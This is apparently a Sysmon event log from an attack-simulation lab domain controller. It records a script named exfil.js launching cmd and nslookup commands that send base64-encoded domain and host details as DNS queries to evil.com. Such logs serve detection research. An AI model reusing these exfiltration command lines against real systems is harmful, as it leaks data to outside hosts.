14:16:25.665{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.665{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.665{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.665{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-BC3F-000000005F02}7788C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.665{2E1864BB-17B9-629A-BA3F-000000005F02}72322556C:\Windows\system32\cmd.exe{2E1864BB-17B9-629A-BC3F-000000005F02}7788C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.678{2E1864BB-17B9-629A-BC3F-000000005F02}7788C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B9-629A-BA3F-000000005F02}7232C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpca.tmp 2>&1 10341000x8000000000000000198665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.618{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-BB3F-000000005F02}4060C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.618{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-BB3F-000000005F02}4060C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.618{2E1864BB-17B9-629A-BB3F-000000005F02}40607364C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-BA3F-000000005F02}7232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.603{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-BB3F-000000005F02}4060C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.603{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.603{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.603{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.603{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.603{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-BA3F-000000005F02}7232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.603{2E1864BB-17A1-629A-783D-000000005F02}5552216C:\Windows\System32\WScript.exe{2E1864BB-17B9-629A-BA3F-000000005F02}7232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.610{2E1864BB-17B9-629A-BA3F-000000005F02}7232C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpca.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.603{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmfabw.tmpMD5=7564BBC357DA8472A939C2EE79A792F5,SHA256=2DBE8B361679ED57394E9EFB1DF40D5559A7E60F6F1F0A6E2904E60B52067C41,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.550{2E1864BB-17B9-629A-B83F-000000005F02}77562404C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-B93F-000000005F02}6020C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.550{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.550{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.550{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.550{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.550{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-B93F-000000005F02}6020C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.550{2E1864BB-17B9-629A-B73F-000000005F02}26046492C:\Windows\system32\cmd.exe{2E1864BB-17B9-629A-B93F-000000005F02}6020C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.558{2E1864BB-17B9-629A-B93F-000000005F02}6020C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B9-629A-B73F-000000005F02}2604C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmfabw.tmp 2>&1 354300x8000000000000000198645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.320{00000000-0000-0000-0000-000000000000}7260<unknown process>-udpfalsefalse127.0.0.1-52525-false127.0.0.1-53domain 354300x8000000000000000198644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.320{00000000-0000-0000-0000-000000000000}7260<unknown process>-udptruefalse127.0.0.1-52525-false127.0.0.1-53domain 354300x8000000000000000198643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.320{00000000-0000-0000-0000-000000000000}7260<unknown process>-udpfalsefalse127.0.0.1-52524-false127.0.0.1-53domain 354300x8000000000000000198642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.319{00000000-0000-0000-0000-000000000000}7260<unknown process>-udpfalsefalse127.0.0.1-52523-false127.0.0.1-53domain 354300x8000000000000000198641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.319{00000000-0000-0000-0000-000000000000}7260<unknown process>-udptruefalse127.0.0.1-52523-false127.0.0.1-53domain 354300x8000000000000000198640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.127{00000000-0000-0000-0000-000000000000}5108<unknown process>-udpfalsefalse127.0.0.1-52521-false127.0.0.1-53domain 354300x8000000000000000198639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.127{00000000-0000-0000-0000-000000000000}5108<unknown process>-udptruefalse127.0.0.1-52521-false127.0.0.1-53domain 354300x8000000000000000198638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.126{00000000-0000-0000-0000-000000000000}5108<unknown process>-udpfalsefalse127.0.0.1-52520-false127.0.0.1-53domain 354300x8000000000000000198637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.126{00000000-0000-0000-0000-000000000000}5108<unknown process>-udptruefalse127.0.0.1-52520-false127.0.0.1-53domain 354300x8000000000000000198636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.126{00000000-0000-0000-0000-000000000000}5108<unknown process>-udptruefalse127.0.0.1-52519-false127.0.0.1-53domain 10341000x8000000000000000198635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.503{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-B83F-000000005F02}7756C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.503{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-B83F-000000005F02}7756C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.503{2E1864BB-17B9-629A-B83F-000000005F02}77562404C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-B73F-000000005F02}2604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 